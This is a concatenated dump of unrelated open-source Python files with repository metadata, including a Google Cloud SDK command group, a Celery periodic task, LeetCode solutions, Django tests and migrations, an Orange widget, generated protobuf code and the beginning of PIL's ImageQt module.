| 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 |
MIT
| 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null |
UTF-8
|
Python
| false | false | 1,982 |
py
|
# -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud container operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.container import container_command_util
from googlecloudsdk.command_lib.container import flags
from googlecloudsdk.command_lib.container import messages
from googlecloudsdk.core import log
class NodePools(base.Group):
"""Create and delete operations for Google Kubernetes Engine node pools."""
@staticmethod
def Args(parser):
"""Add arguments to the parser.
Args:
parser: argparse.ArgumentParser, This is a standard argparser parser with
which you can register arguments. See the public argparse documentation
for its capabilities.
"""
flags.AddZoneAndRegionFlags(parser)
def Filter(self, context, args):
"""Modify the context that will be given to this group's commands when run.
Args:
context: {str:object}, A set of key-value pairs that can be used for
common initialization among commands.
args: argparse.Namespace: The same namespace given to the corresponding
.Run() invocation.
Returns:
The refined command context.
"""
context['location_get'] = container_command_util.GetZoneOrRegion
return context
|
[
"[email protected]"
] | |
b2617614628599bfb4b9f00487c546159e392f55
|
e663909cec3c4eda12bb705fce9a6dc901bb7d88
|
/爬虫/day12 celery/案例/定时任务的使用/tasks.py
|
4c40c0aff2ac3b0e98d732cc5040744ae7ff06b3
|
[] |
no_license
|
1284753334/learning2
|
a03f293965a652883503cae420d8b1ad11ae6661
|
f2fcb3c856656cc8427768b41add3ee083487592
|
refs/heads/master
| 2023-01-30T23:18:26.951210 | 2020-12-20T15:57:18 | 2020-12-20T15:57:18 | 315,065,804 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 461 |
py
|
from celery import Celery
from celery import Task
# Celery app using the same Redis instance (db 2) as broker and result backend.
app = Celery('tasks', backend='redis://:[email protected]:6379/2',
             broker='redis://:[email protected]:6379/2')
# Load the beat schedule and other settings from celery_config.py.
app.config_from_object('celery_config')


@app.task(bind=True)
def period_task(self):
    """Periodic task: logs its own request id each time beat fires it."""
    print('period task done: {0}'.format(self.request.id))

# Run the worker:
# celery -A tasks worker -l info -P eventlet
# Run the beat scheduler (started via the .bat script; scheduled tasks then run automatically):
# celery -A tasks beat
|
[
"[email protected]"
] | |
e50c5b58cede70ff4ee4e99a6462a2a0bfa66ebb
|
1c390cd4fd3605046914767485b49a929198b470
|
/leetcode/number-of-ways-to-reorder-array-to-get-same-bst.py
|
20d18c287b19a6543b31a2e3550bee7c771d1829
|
[] |
no_license
|
wwwwodddd/Zukunft
|
f87fe736b53506f69ab18db674311dd60de04a43
|
03ffffee9a76e99f6e00bba6dbae91abc6994a34
|
refs/heads/master
| 2023-01-24T06:14:35.691292 | 2023-01-21T15:42:32 | 2023-01-21T15:42:32 | 163,685,977 | 7 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 320 |
py
|
class Solution:
    def numOfWays(self, a: "List[int]") -> int:
        """Count the reorderings of *a* that build the same BST
        (LeetCode 1569), modulo 10**9 + 7.

        The count of valid orderings is n! divided by the subtree size at
        every node of the BST built from *a*; subtract 1 to exclude the
        original ordering itself.
        """
        # BUG FIX: `factorial` was referenced without an import (LeetCode
        # injects it); import it explicitly so the module stands alone.
        # The annotation is quoted so the missing `List` import cannot
        # raise NameError at class-definition time.
        from math import factorial

        z = factorial(len(a))

        def F(sub):
            # Divide by the size of each subtree along the recursion.
            nonlocal z
            if sub:
                z //= len(sub)
                F([i for i in sub if i < sub[0]])
                F([i for i in sub if i > sub[0]])

        F(a)
        return (z - 1) % 1000000007
|
[
"[email protected]"
] | |
d84008737b9bd1f9dcb63e284d0f2f7a674116bc
|
d880b55d45726a9b9b12d24b059769350eeb6fb6
|
/app/tests/test_eventactions.py
|
0d49b3c282c0d5aaafc4cee1e7dc907315c8b1b1
|
[
"Apache-2.0"
] |
permissive
|
twatchy/cito_engine
|
261a0bbf0dbdf1fe8cca19f598972307bc7df1c7
|
a62dce3c76567dd36b7efcaa70e03728b335f44e
|
refs/heads/master
| 2020-04-21T11:36:25.187256 | 2016-11-01T03:37:13 | 2016-11-01T03:37:13 | 169,531,529 | 0 | 0 |
Apache-2.0
| 2019-02-07T06:57:48 | 2019-02-07T06:57:43 |
Python
|
UTF-8
|
Python
| false | false | 4,329 |
py
|
"""Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
from mock import patch, call
from django.test import TestCase
from cito_engine.models import Incident, IncidentLog, EventActionCounter
from cito_engine.poller.event_poller import EventPoller
from . import factories
class TestEventActions(TestCase):
    """
    X = 2, Y=100
    Case 1
    * One incident in T secs
    * 2nd at T+10, 3rd at T+11, 4th at T+51
    * Assert we have 1 single incident, 4 logs and event action executed once
    * 5th incident occurs at T+101
    * Assert counters are reset
    * 6th incident occurs at T+151
    * Assert event action is executed for the second time
    """
    def setUp(self):
        # One event whose action triggers after 2 incidents within 100s.
        self.event = factories.EventFactory.create()
        self.eventaction = factories.EventActionFactory.create(event=self.event,threshold_count=2, threshold_timer=100)

    @patch('cito_engine.actions.incidents.requests')
    def test__single_event_action_execution(self, mock_requests):
        # Base time for the incident window; all timestamps are offsets of T.
        T = int(time())
        raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, T)
        eventpoller = EventPoller()
        self.assertTrue(eventpoller.parse_message(raw_incident))
        incident = Incident.objects.filter()[0]
        eacounter = EventActionCounter.objects.get(incident=incident)
        self.assertFalse(eacounter.is_triggered)
        # 2nd incident
        raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
            self.event.id, T+10)
        self.assertTrue(eventpoller.parse_message(raw_incident))
        eacounter = EventActionCounter.objects.get(incident=incident)
        self.assertTrue(eacounter.is_triggered)
        #3rd incident
        raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
            self.event.id, T + 11)
        self.assertTrue(eventpoller.parse_message(raw_incident))
        eacounter = EventActionCounter.objects.get(incident=incident)
        self.assertTrue(eacounter.is_triggered)
        # 4th incident
        raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
            self.event.id, T + 51)
        self.assertTrue(eventpoller.parse_message(raw_incident))
        eacounter = EventActionCounter.objects.get(incident=incident)
        self.assertTrue(eacounter.is_triggered)
        #We should have one incident and 4 incident logs
        self.assertEqual(Incident.objects.count(), 1)
        self.assertEqual(IncidentLog.objects.count(), 4)
        # Assert we only execute plugin once
        self.assertEqual(mock_requests.post.call_count, 1)
        # 5th incident after time window
        raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
            self.event.id, T + 101)
        self.assertTrue(eventpoller.parse_message(raw_incident))
        eacounter = EventActionCounter.objects.get(incident=incident)
        self.assertFalse(eacounter.is_triggered)
        # Assert we did not execute plugin yet
        self.assertEqual(mock_requests.post.call_count, 1)
        # 6th incident after time window
        raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
            self.event.id, T + 121)
        self.assertTrue(eventpoller.parse_message(raw_incident))
        eacounter = EventActionCounter.objects.get(incident=incident)
        self.assertTrue(eacounter.is_triggered)
        # Assert event action occurred for the second time
        self.assertEqual(mock_requests.post.call_count, 2)
    #todo create tests to check use cases mentioned in the comments
|
[
"[email protected]"
] | |
20691830fbf91a5caae39677d6ec0024590b522a
|
72b00923d4aa11891f4a3038324c8952572cc4b2
|
/python/datastruct/dd_oob/pgm07_28.txt
|
c1f7f8084c1a8e16b2bdb107bdc35ca04776988a
|
[] |
no_license
|
taowuwen/codec
|
3698110a09a770407e8fb631e21d86ba5a885cd5
|
d92933b07f21dae950160a91bb361fa187e26cd2
|
refs/heads/master
| 2022-03-17T07:43:55.574505 | 2022-03-10T05:20:44 | 2022-03-10T05:20:44 | 87,379,261 | 0 | 0 | null | 2019-03-25T15:40:27 | 2017-04-06T02:50:54 |
C
|
UTF-8
|
Python
| false | false | 722 |
txt
|
#
# This file contains the Python code from Program 7.28 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by Bruno R. Preiss.
#
# Copyright (c) 2003 by Bruno R. Preiss, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm07_28.txt
#
class SortedListAsArray(OrderedListAsArray, SortedList):
    def withdraw(self, obj):
        """Remove *obj* from this sorted, array-backed list.

        Raises ContainerEmpty when the list holds no elements and
        KeyError when *obj* is not found.
        """
        if self._count == 0:
            raise ContainerEmpty
        # findOffset returns a negative value when obj is absent.
        offset = self.findOffset(obj)
        if offset < 0:
            raise KeyError
        i = offset
        # Close the gap by shifting every later element one slot left.
        # NOTE(review): at i == self._count - 1 this reads
        # self._array[self._count]; presumably the backing array's
        # capacity exceeds _count -- confirm against the Array class.
        while i < self._count:
            self._array[i] = self._array[i + 1]
            i += 1
        # Clear the now-unused trailing slot and shrink the logical size.
        self._array[i] = None
        self._count -= 1
        # ...
|
[
"[email protected]"
] | |
2a0f864a90d2c9af31adaade203406309f66c9d1
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_333/ch77_2020_04_13_15_29_15_904054.py
|
a10778292bfbe71d82aaf9be4a6d5a915023fc82
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 348 |
py
|
import math


def calcula_tempo(dicionario):
    """Map each (name, acceleration) pair to the time needed to cover 200 m.

    *dicionario* is iterated directly; each item must be indexable, with
    the name at position 0 and the acceleration at position 1.
    """
    return {item[0]: aceleracao_tempo(int(item[1])) for item in dicionario}


def aceleracao_tempo(a):
    """Return the time to travel 200 m from rest at constant acceleration *a*.

    Derived from s = a*t^2/2 with s = 200.
    """
    return math.sqrt(200 / a)
|
[
"[email protected]"
] | |
8ea08f6a84070e59475e3de8786df6296cbdddd9
|
a989ff888d86eaad7d3572993d89af17bb29c7ec
|
/kartverket_stormsurge/helper/datetimes.py
|
981e44efed210c6a738f00d83a0f60092b15ec65
|
[
"MIT"
] |
permissive
|
jerabaul29/kartverket_storm_surge_data
|
8f873232a3aff92f07a73220e51f8385278a029a
|
9a35492550ec8b3f4c0b7f1d17bf3bb4776f2c49
|
refs/heads/master
| 2023-01-31T02:17:34.834755 | 2020-12-15T10:30:54 | 2020-12-15T10:30:54 | 287,529,304 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,229 |
py
|
import datetime
import pytz
from kartverket_stormsurge.helper.raise_assert import ras
def assert_is_utc_datetime(date_in):
    """Assert that date_in is an UTC datetime."""
    ras(isinstance(date_in, datetime.datetime))
    # Accept either the pytz UTC singleton or the stdlib UTC tzinfo.
    if not (date_in.tzinfo == pytz.utc or
            date_in.tzinfo == datetime.timezone.utc):
        raise Exception("not utc!")
    # Soft-deprecation warning: stdlib UTC is preferred over pytz.
    if date_in.tzinfo == pytz.utc:
        print("prefer using datetime.timezone.utc to pytz.utc")
def assert_10min_multiple(date_in):
    """Assert that date_in is a datetime that is a
    multiple of 10 minutes.
    """
    ras(isinstance(date_in, datetime.datetime))
    # Exactly on a 10-minute boundary: whole minutes divisible by 10,
    # no seconds, no sub-second component.
    ras(date_in.second == 0)
    ras((date_in.minute % 10) == 0)
    ras(date_in.microsecond == 0)
def datetime_range(datetime_start, datetime_end, step_timedelta):
    """Yield UTC datetimes in [datetime_start; datetime_end[ spaced
    step_timedelta apart."""
    assert_is_utc_datetime(datetime_start)
    assert_is_utc_datetime(datetime_end)
    ras(isinstance(step_timedelta, datetime.timedelta))
    ras(datetime_start < datetime_end)
    ras(step_timedelta > datetime.timedelta(0))

    # The start is always yielded (the asserts guarantee start < end);
    # the end bound itself is excluded.
    crrt = datetime_start
    while crrt < datetime_end:
        yield crrt
        crrt += step_timedelta
def datetime_segments(datetime_start, datetime_end, step_timedelta):
    """Generate a succession of (start, end) segments covering
    [datetime_start; datetime_end].

    Every segment spans step_timedelta except possibly the last one,
    which is clipped to end exactly at datetime_end."""
    assert_is_utc_datetime(datetime_start)
    assert_is_utc_datetime(datetime_end)
    ras(isinstance(step_timedelta, datetime.timedelta))
    ras(datetime_start < datetime_end)
    ras(step_timedelta > datetime.timedelta(0))

    seg_start = datetime_start
    while True:
        seg_end = seg_start + step_timedelta
        if seg_end >= datetime_end:
            # Final (possibly shorter) segment, clipped to the end bound.
            yield (seg_start, datetime_end)
            return
        yield (seg_start, seg_end)
        seg_start = seg_end
|
[
"[email protected]"
] | |
3f1602c001f4b70e038794a08ba4c725871c4198
|
040bd1995190e858299fcdd716bd986aa0664d13
|
/Trees and Graphs/MaxiumumDepthOfBinaryTree.py
|
04b51d71defc1958be86b73fc93dbac3a0196e5e
|
[] |
no_license
|
PravinSelva5/LeetCode_Grind
|
7c568d68231ff34332d756237e79ca8d19cebfec
|
aa5fb8eb12b1e1903cb0cb688dc41f959e4caf6a
|
refs/heads/master
| 2023-02-08T13:05:10.355867 | 2021-01-05T02:55:29 | 2021-01-05T02:55:29 | 271,690,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,066 |
py
|
'''
Given the root of a binary tree, return its maximum depth.
A binary tree's maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node
--------------------
RESULTS
--------------------
Time Complexity: O(N)
Space Complexity: O(H), H represents the height of the tree
Runtime: 32 ms, faster than 97.68% of Python3 online submissions for Maximum Depth of Binary Tree.
Memory Usage: 16.2 MB, less than 33.21% of Python3 online submissions for Maximum Depth of Binary Tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def maxDepth(self, root: TreeNode) -> int:
        """Return the number of nodes on the longest root-to-leaf path."""
        # Empty subtree contributes nothing; otherwise the depth is one
        # (this node) plus the deeper of the two subtrees.  A leaf yields
        # 1 + max(0, 0) == 1, matching the explicit leaf case it replaces.
        if root is None:
            return 0
        return 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))
|
[
"[email protected]"
] | |
633981c5580abc6b32852ac0098516780d0c8861
|
d9563f113fa4dcbf6dadb5ea186d69839f372119
|
/pedidos/migrations/0004_auto_20191129_1821.py
|
08c3d750eba80e0bc31f5b96aa8c4b9131fc203e
|
[] |
no_license
|
CarlosSanz81/serv
|
717eefea1ead9325472cef165f2326a14dd355cd
|
dd3cb5b022b8b939ff6ea502b8335c257d057abb
|
refs/heads/master
| 2020-09-16T03:41:16.306550 | 2019-12-05T12:41:01 | 2019-12-05T12:41:01 | 223,640,310 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 406 |
py
|
# Generated by Django 2.2.7 on 2019-11-29 17:21
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: make ``Archivo.nombre`` an optional FileField."""

    dependencies = [
        ('pedidos', '0003_archivo'),
    ]

    operations = [
        migrations.AlterField(
            model_name='archivo',
            name='nombre',
            # blank/null allow the field to be empty; uploads go to ./media/.
            field=models.FileField(blank=True, null=True, upload_to='./media/'),
        ),
    ]
|
[
"[email protected]"
] | |
c92c8e96486ba05e3cf7c3d52836a06125a9a899
|
3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1
|
/nlp/3rdParty/orange/orange/OrangeWidgets/Prototypes/OWPreprocessing.py
|
168864c2174450afb47cb0f7ac89fb6b1324b927
|
[] |
no_license
|
stefie10/slu_hri
|
a76f79094bd1740676fec5d889411ba3b1d9dc26
|
50753379953e1ff822162eeab094cffe4a30f3e1
|
refs/heads/master
| 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,742 |
py
|
"""
<name>Preprocessing</name>
<description>Constructs data preprocessors.</description>
<icon>icons/FeatureConstructor.png</icon>
<priority>11</priority>
<contact>Janez Demsar (janez.demsar(@at@)fri.uni-lj.si)</contact>
"""
from OWWidget import *
import OWGUI, math, re
from orngWrap import Preprocessor
class OWPreprocessing(OWWidget):
    """Orange widget that emits a fresh Preprocessor and, when example
    data is connected, the preprocessed examples."""

    # One (empty-key) context handler matching on the exact domain.
    contextHandlers = {"": PerfectDomainContextHandler()}

    def __init__(self,parent=None, signalManager = None):
        OWWidget.__init__(self, parent, signalManager, "Preprocessing")
        # Input: optional example table; outputs: the preprocessor object
        # plus the examples after running it.
        self.inputs = [("Examples", ExampleTable, self.setData)]
        self.outputs = [("Preprocessor", Preprocessor), ("Examples", ExampleTable)]
        OWGUI.button(self.controlArea, self, "Apply", callback=self.apply)
        self.loadSettings()
        # Build and send an initial preprocessor on startup.
        self.apply()
        self.adjustSize()

    def setData(self, data):
        """Store the incoming example table and re-emit processed data."""
        self.data = data
        self.sendData()

    def sendData(self):
        """Send the (possibly preprocessed) examples downstream."""
        if not self.data or not self.preprocessor:
            self.preprocessed = self.data
        else:
            self.preprocessed = self.preprocessor.processData(self.data)
        self.send("Examples", self.preprocessed)

    def apply(self):
        """Construct and emit a brand-new Preprocessor instance."""
        # The widget needs to construct a new instance of Preprocessor
        # If it modified and send the same instance every time, it would
        # modify an instance which has been passed to another widget which
        # might have a disabled connection and should not get any modifications
        # (and would even not get notified about the preprocessor having been changed)
        self.preprocessor = Preprocessor()
        self.send("Preprocessor", self.preprocessor)
|
[
"[email protected]"
] | |
bd63b8e1ecf45c334724bc34debf628114b3047e
|
f734a39a0c37186e90caea597f13000823c9e67a
|
/leetcode/Hash Table/1213. Intersection of Three Sorted Arrays.py
|
658d6de9e6d97a5ad69bbe7071633e6fde37a8e0
|
[
"MIT"
] |
permissive
|
yanshengjia/algorithm
|
681746e0371a82860e64a279bfe4c83545469641
|
46caaf74aeab8af74861fb5b249eb4169baf8493
|
refs/heads/master
| 2022-08-02T20:15:57.927418 | 2022-07-17T14:43:51 | 2022-07-17T14:43:51 | 192,160,418 | 69 | 32 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,006 |
py
|
"""
Given three integer arrays arr1, arr2 and arr3 sorted in strictly increasing order, return a sorted array of only the integers that appeared in all three arrays.
Example 1:
Input: arr1 = [1,2,3,4,5], arr2 = [1,2,5,7,9], arr3 = [1,3,4,5,8]
Output: [1,5]
Explanation: Only 1 and 5 appeared in the three arrays.
Solution:
Use Hashtable to record the frequency of numbers, a number in intersection should have the frequency of 3
"""
# Time: O(m+n+q), m n q is the length of 3 arrays
# Space: O(x), x it the size of intersection
class Solution:
    def arraysIntersection(self, arr1: List[int], arr2: List[int], arr3: List[int]) -> List[int]:
        """Return, in ascending order, the values present in all three
        strictly increasing arrays.

        Each array is strictly increasing and therefore duplicate-free,
        so a value with overall frequency 3 must appear once per array.
        """
        freq = {}
        for seq in (arr1, arr2, arr3):
            for value in seq:
                freq[value] = freq.get(value, 0) + 1
        return sorted(value for value, count in freq.items() if count == 3)
|
[
"[email protected]"
] | |
7c2d99114b3aafbeb624eb534da25400a8ae4e87
|
06c1d6bcd099bf1c25abb52ba07351b068d1ab16
|
/Unidad_3/leccion_3.py
|
7c26b82dce0e0e918ab604fafd4e3dc5a427c8aa
|
[] |
no_license
|
dafnemus/python-curso-udemy
|
1105e5f51980d6f5ec32dac338ebc340250c6384
|
493717fb321b24bd5abcadb8e27d25d68b4f12f8
|
refs/heads/main
| 2023-03-09T12:27:41.934087 | 2021-02-24T18:34:56 | 2021-02-24T18:34:56 | 337,728,568 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,638 |
py
|
# pylint: disable=missing-docstring
# 1. Aplica un incremento de sueldo del 8% al salario de un trabajador.
# Para ello, recuerda que primero debes solicitar el monto base del salario.
def incrementar_sueldo(sueldo):
    """Print a salary raised by a flat 8% together with the raise amount."""
    TASA = 0.08
    aumento = sueldo * TASA
    print(f'Total sueldo:{sueldo + aumento}', end=' ')
    print(f'incremento: {aumento}')


incrementar_sueldo(2000)
print()
# 2. Aplica un incremento de sueldo del 8% al salario de un trabajador,
# solo si este gana menos que el salario mínimo
# (escoge cualquier valor para el salario mínimo, porejemplo 1000).
# Si el trabajador gana más que el salario mínimo, el incremento es del 5%
def incrementar_sueldo_2(sueldo):
    """Print a raised salary: 8% at or below the minimum wage (1000),
    5% above it, plus the raise amount."""
    SUELDO_MINIMO = 1000
    tasa = 0.08 if sueldo <= SUELDO_MINIMO else 0.05
    aumento = sueldo * tasa
    print(f'Total sueldo:{sueldo + aumento}', end=' ')
    print(f'incremento: {aumento}')


incrementar_sueldo_2(800)
incrementar_sueldo_2(2000)
print()
# 3. Dado un valor que representa una cantidad en segundos,
# indica su equivalente en minutos, horas y días.
def convertir_segundos(segundos):
    """Print the equivalent of *segundos* in hours, minutes and days."""
    SEGUNDOS_MINUTO = 60
    SEGUNDOS_HORA = 3600
    SEGUNDOS_DIA = 86400
    print(f'segundos {segundos}')
    print(f'segundos a hora: {segundos / SEGUNDOS_HORA}')
    print(f'segundos a minutos: {segundos / SEGUNDOS_MINUTO}')
    # NOTE: 'segundosa' (missing space) reproduces the original output.
    print(f'segundosa dias: {segundos / SEGUNDOS_DIA}')


convertir_segundos(87600)
print()
# 4. Determinar el mínimo de 3 valores solicitados. Ahora, con 4 valores.
# Shared accumulator for the minimum-of-N exercise.
lista_valores = []


def agregar_valor(valor):
    """Append *valor* to the shared value list."""
    lista_valores.append(valor)


def minimo():
    """Print the stored values and, for at most 4 of them, their minimum."""
    print(f'valores: {lista_valores}')
    if len(lista_valores) > 4:
        return
    print(f'valor minimo: {min(lista_valores)}')


agregar_valor(2)
agregar_valor(8)
agregar_valor(3)
minimo()
print()
# 5. Solicita al usuario, un número mayor que cero y menor a un millón,
# determina si el número de dígitos de dicho valor.
# Así, si el valor ingresado es 3, entonces el resultado será 1.
# Del mismo modo, si el valor ingresado es 768590, el resultado será 6
def contar_digitos(numero):
    """Print how many digits *numero* has, for 0 < numero < 1,000,000.

    Out-of-range values are silently ignored, as in the exercise text.
    """
    if not 0 < numero < 1000000:
        return
    print(f'el numero {numero} tiene {len(str(numero))} digitos')


contar_digitos(22)
|
[
"[email protected]"
] | |
19c1083ddebaae8a8cafbbfcbc4f663167f858b0
|
79fa6f3a9c0c07b2768b5c67d48cd2d3ada921c7
|
/kikimr/public/api/grpc/ydb_export_v1_pb2.py
|
8b1ed589a3769c3321e6a8c3913604b83594a9b6
|
[
"Apache-2.0"
] |
permissive
|
clumpytuna/ydb-python-sdk
|
8dd951a532045587fcba1d541b3fb8798c358318
|
f09d8db19f62032738ed77dabb3672c3e0f86cc3
|
refs/heads/master
| 2023-06-09T22:38:29.747969 | 2021-06-30T08:09:14 | 2021-06-30T08:09:14 | 319,103,389 | 0 | 0 |
NOASSERTION
| 2020-12-06T18:32:35 | 2020-12-06T18:32:34 | null |
UTF-8
|
Python
| false | true | 2,581 |
py
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kikimr/public/api/grpc/ydb_export_v1.proto
# NOTE: auto-generated descriptor module for the Ydb.Export.V1 gRPC service;
# regenerate with protoc instead of editing by hand.

import sys
# _b: encode string literals to latin1 bytes on Python 2, identity on Python 3.
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


from kikimr.public.api.protos import ydb_export_pb2 as kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2


# File descriptor built from the serialized .proto definition.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='kikimr/public/api/grpc/ydb_export_v1.proto',
  package='Ydb.Export.V1',
  syntax='proto3',
  serialized_pb=_b('\n*kikimr/public/api/grpc/ydb_export_v1.proto\x12\rYdb.Export.V1\x1a)kikimr/public/api/protos/ydb_export.proto2\xa9\x01\n\rExportService\x12K\n\nExportToYt\x12\x1d.Ydb.Export.ExportToYtRequest\x1a\x1e.Ydb.Export.ExportToYtResponse\x12K\n\nExportToS3\x12\x1d.Ydb.Export.ExportToS3Request\x1a\x1e.Ydb.Export.ExportToS3ResponseB\x1a\n\x18\x63om.yandex.ydb.export.v1b\x06proto3')
  ,
  dependencies=[kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)


DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030com.yandex.ydb.export.v1'))

# ExportService: two unary RPCs, ExportToYt and ExportToS3.
_EXPORTSERVICE = _descriptor.ServiceDescriptor(
  name='ExportService',
  full_name='Ydb.Export.V1.ExportService',
  file=DESCRIPTOR,
  index=0,
  options=None,
  serialized_start=105,
  serialized_end=274,
  methods=[
  _descriptor.MethodDescriptor(
    name='ExportToYt',
    full_name='Ydb.Export.V1.ExportService.ExportToYt',
    index=0,
    containing_service=None,
    input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTREQUEST,
    output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTRESPONSE,
    options=None,
  ),
  _descriptor.MethodDescriptor(
    name='ExportToS3',
    full_name='Ydb.Export.V1.ExportService.ExportToS3',
    index=1,
    containing_service=None,
    input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3REQUEST,
    output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3RESPONSE,
    options=None,
  ),
])
_sym_db.RegisterServiceDescriptor(_EXPORTSERVICE)

DESCRIPTOR.services_by_name['ExportService'] = _EXPORTSERVICE

# @@protoc_insertion_point(module_scope)
|
[
"[email protected]"
] | |
6733aab9ea53e9cbe7a36f8c18521ad328708815
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/pytorch/source/PIL/ImageQt.py
|
b747781c50bd2eede24eb9145a6224a4a90712ff
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504 | 2022-11-29T13:35:35 | 2022-11-29T13:35:35 | 71,386,735 | 1,283 | 263 |
MIT
| 2022-11-26T05:02:14 | 2016-10-19T18:22:39 |
Python
|
UTF-8
|
Python
| false | false | 6,558 |
py
|
#
# The Python Imaging Library.
# $Id$
#
# a simple Qt image interface.
#
# history:
# 2006-06-03 fl: created
# 2006-06-04 fl: inherit from QImage instead of wrapping it
# 2006-06-05 fl: removed toimage helper; move string support to ImageQt
# 2013-11-13 fl: add support for Qt5 ([email protected])
#
# Copyright (c) 2006 by Secret Labs AB
# Copyright (c) 2006 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isPath, py3
from io import BytesIO
import sys
# Candidate Qt bindings, tried in order until one imports successfully.
qt_versions = [
    ['5', 'PyQt5'],
    ['side2', 'PySide2'],
    ['4', 'PyQt4'],
    ['side', 'PySide']
]
# If a version has already been imported, attempt it first
qt_versions.sort(key=lambda qt_version: qt_version[1] in sys.modules,
                 reverse=True)
for qt_version, qt_module in qt_versions:
    try:
        if qt_module == 'PyQt5':
            from PyQt5.QtGui import QImage, qRgba, QPixmap
            from PyQt5.QtCore import QBuffer, QIODevice
        elif qt_module == 'PySide2':
            from PySide2.QtGui import QImage, qRgba, QPixmap
            from PySide2.QtCore import QBuffer, QIODevice
        elif qt_module == 'PyQt4':
            from PyQt4.QtGui import QImage, qRgba, QPixmap
            from PyQt4.QtCore import QBuffer, QIODevice
        elif qt_module == 'PySide':
            from PySide.QtGui import QImage, qRgba, QPixmap
            from PySide.QtCore import QBuffer, QIODevice
    except (ImportError, RuntimeError):
        # Binding not available (or failed to initialize): try the next one.
        continue
    qt_is_installed = True
    break
else:
    # No binding imported: the module degrades to "Qt not installed" mode.
    qt_is_installed = False
    qt_version = None
def rgb(r, g, b, a=255):
    """(Internal) Turns an RGB color into a Qt compatible color integer."""
    # qRgba packs the four channels; the mask forces the packed value
    # into the unsigned 32-bit range regardless of the sign Qt returns.
    return qRgba(r, g, b, a) & 0xffffffff
def fromqimage(im):
    """Convert a Qt QImage into a PIL Image by round-tripping through an
    in-memory PNG (with alpha) or PPM (without) buffer.

    :param im: A PIL Image object, or a file name
      (given either as Python string or a PyQt string object)
    """
